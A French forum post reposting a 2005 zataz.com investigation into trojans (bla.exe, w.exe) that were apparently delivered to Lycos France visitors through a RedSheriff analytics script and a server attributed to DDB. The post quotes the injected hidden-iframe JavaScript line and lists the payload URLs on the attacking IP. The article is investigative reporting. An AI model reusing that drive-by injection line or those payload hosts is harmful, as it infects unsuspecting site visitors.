Discutaction
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.



 
AccueilAccueil  RechercherRechercher  Dernières imagesDernières images  S'enregistrerS'enregistrer  Connexion  
-28%
Le deal à ne pas rater :
-28% Machine à café avec broyeur à grain MELITTA Purista
229.99 € 318.99 €
Voir le deal

Discutaction :: Parlons-en ... actualité et dossiers de fond :: Société :: Le capital au pouvoir :: Magouilles et corruption
 

 Des pirates sur la ligne ?

Aller en bas 
AuteurMessage
wapasha
Langue pendue
wapasha


Nombre de messages : 4560
Localisation : Pays des Abers
Date d'inscription : 30/04/2005

Des pirates sur la ligne ? Empty
MessageSujet: Des pirates sur la ligne ?   Des pirates sur la ligne ? EmptyDim 10 Juil à 16:37
zataz-10 / 7 / 2005
Des pirates sur la ligne ?

Sylla1337 est un surfeur comme il en existe des millions sur Internet. Seulement, lui, il s'est étonné d'un étrange manége dans son ordinateur alors qu'il visitait Lycos France, vendredi. "Je me baladais sur http://www.multimania.lycos.fr/ quand tout à coup un programme essaye de se connecter à Internet. C'est plutôt louche, je refuse d'autant plus que le programme en question s'appelait bla.exe. Je fais une recherche sur mon disque dur et je découvre ce fameux bla.exe."

Citation :
Nous allons refaire son itinéraire. Depuis, une question nous taraude : DDB, Lycos et RedSheriff ont-ils servi à un piratage de masse de plusieurs millions d'Internautes ?

Nous prenons donc comme navigateurs tests Firefox et Internet Explorer et nous commençons à enquêter sur ce bout de code qui n'a strictement rien à faire là. Nous allons donc tester la chose sur trois machines. Une sans antivirus, la seconde avec Norton 2005 et la troisième avec Bitdefenders pro 8. En nous rendant sur Lycos, effectivement, un programme tente de s'initier dans les trois machines. Bitdefenders va d'ailleurs nous alerter d'une tentative d'intrusion par le cheval de Troie BehavesLike:Trojan.Downloader.

Des pirates sur la ligne ? 31770935542d057c0d9c58 Les logs du firewall

Norton ne va rien détecter du tout et la troisième machine, vierge de protection, aura, elle aussi, son petit programme bla.exe, installé sur C:/. "J'ai effectué des tests depuis deux sites hébergés chez Multimania Lycos et depuis le portail de Lycos. Les résultats sont identiques. Le téléchargement se fait à partir du script qui est installé en bas de page de Lycos. Un script qui est aussi imposé dans les pages personnelles. Il est à rajouter en bas de page" confie Salyy1337. Effectivement, dans le code source de ce script, que vous pouvez toujours lire sur le site Lycos, apparaît les informations sur Redsheriff. // RedSheriff Customer Intelligence - V5 // COPYRIGHT 2003 RedSheriff Limited.

Sheriff, fais-moi peur
RedSheriff est l'un des principaux fournisseurs mondiaux de données sur le recensement des visites d'Internet axé sur les sites. Cette société appartient aujourd'hui à Nielsen//NetRatings. Un géant de l'Internet spécialisé dans le placement rapide et efficace de publicités, panneaux et autres sites intégrés pour les solutions de recensement des visites d'Internet. De là à dire que Redsheriff utilise des méthodes illégales pour obtenir des informations sur les visiteurs il y a un grand pas. Et nous allons le franchir avec ce qui va suivre.

Des pirates sur la ligne ? 93457736942d05798f26fe

En regardant de plus prêt le code source de Lycos, on découvre en fin de page qu'un Java Script (.JS) est exécuté via un serveur de Redsheriff (http://secure-uk.imrworldwide.com/v5.js). Trés étonnant, lors de nos deux visites, décalées de 24 heures, le code avait changé. Une ligne avait disparu. Vous nous connaissez, nous sauvegardons pour analyse, surtout quand un doute nous assaille. La ligne était la suivante : if(_rsCT=='modem')document.write('<iframe style="visibility:hidden" width=0 eight=0 src="http://209.225.34.37/c/"></iframe>');

L'ip donné dans cette ligne "fantôme" renvoi sur un autre serveur qui va chercher le fameux programme Bla.exe et l'installer dans nos deux machines, celle protégée par BitDefenders ayant mis bla.exe à la poubelle, nous allons donc décortiquer nos deux Bla.exe récupérés grâce à nos machines tests. Nous allons aussi décortiquer le fichier de Sylla1337 afin de découvrir ce qu'il cache. Première chose, les trois Bla.exe sont identiques. Une fois exécutés, ils vont chercher un second programme, tout aussi infecté, baptisé w.exe. Voilà qui commence à faire beaucoup pour une société qui n'est censé que de diffuser des cookies pour des analyses marketing et autres diffusions publicitaires. D'autant plus qu'apparaît dans ce grand merdier électronique une agence de publicité connue mondialement, DDB.

Que vient donc faire ces vendeurs de rêve dans cette intrusion informatique, qui pour rappel est punie par la loi ? DDB est le propriétaire du serveur ayant pour mission d'infecter les machines de visiteurs. Comme le montre notre capture écran, 209.225.34.37, renvoie sur une page en construction de la société DDB WorldWIde. Elle est hébergée chez Savvis. Si vous rajoutez les informations trouvées dans les codes sources nous arrivons sur http://209.225.34.37/c/, http://209.225.34.37/c/l.php. Dans ce second cas, le fichier PHP a disparu (Nous l'avons sauvegardé), l'applet qu'il appelait était doté d'une fonction "doShit" qui avait pour mission de perturber les sécurités Java. Il permettait de télécharger, entre autre, le programme my.class, nous allons y revenir. Deux autres class sont encore disponible sur le serveur de DDB : http://209.225.34.37/c/jvm.class et http://209.225.34.37/c/Beyond.class. Ces deux fichiers utilisent aussi l'exploit cité ci-dessus permettant de télécharger un contenu sur une machine non protégée. Pour le Beyond.class, par exemple, nous avons découvert un moyen d'outrepasser les sécurités de Windows... et qui va, lui aussi, chercher un my.class (http://209.225.34.37/c/d/my.class) qui n'est rien d'autre que notre fameux trojan bla.exe.

Des pirates sur la ligne ? 203758740542d057b0345a2

Le fichier w.exe est encore plus étrange. En le désassemblant nous nous retrouvons avec un merdier numérique difficilement compréhensible à notre niveau. Chose est certaine, nous avons à faire au cheval de Troie (Trojan) Small.bce. Ce fichier fait appel à la base de registre mais également à la librairie WININET et à sa fonction OpenInternetA. Ce qui nous semble plus inquiétant est l'ensemble des mots inscrits dans ce code : "Internet Explorer", "dial" ou encore "phone". Sans parler des accés à c:\winamp.exe ou encore c:\winampa.exe.

Voilà qui est loin d'être rassurant, n'est ce pas ? Lycos diffuse des outils que l'on peut considérer comme pirate à l'insu de son plein grés ? Les Australiens de RedSheriff sont-ils au courant que leur client américain de BDD WorldWide diffuse un cheval de Troie en utilisant leur code source ? Et la société BDD WorldWide aurait-elle été piratée ? Il nous parait tellement énorme que de telles sociétés agissent de la sorte. Beaucoup de questions que nous avons posé à ces trois entreprises.
A suivre..
source : http://www.zataz.com/news/8855/redsherrif.html

@+
Revenir en haut Aller en bas
 
Des pirates sur la ligne ?
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» les studios veulent faire de nous des pirates
» Les chasseurs de pirates du Net se tirent dans les pattes

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Discutaction :: Parlons-en ... actualité et dossiers de fond :: Société :: Le capital au pouvoir :: Magouilles et corruption-
Sauter vers:  
Ne ratez plus aucun deal !
Abonnez-vous pour recevoir par notification une sélection des meilleurs deals chaque jour.
IgnorerAutoriser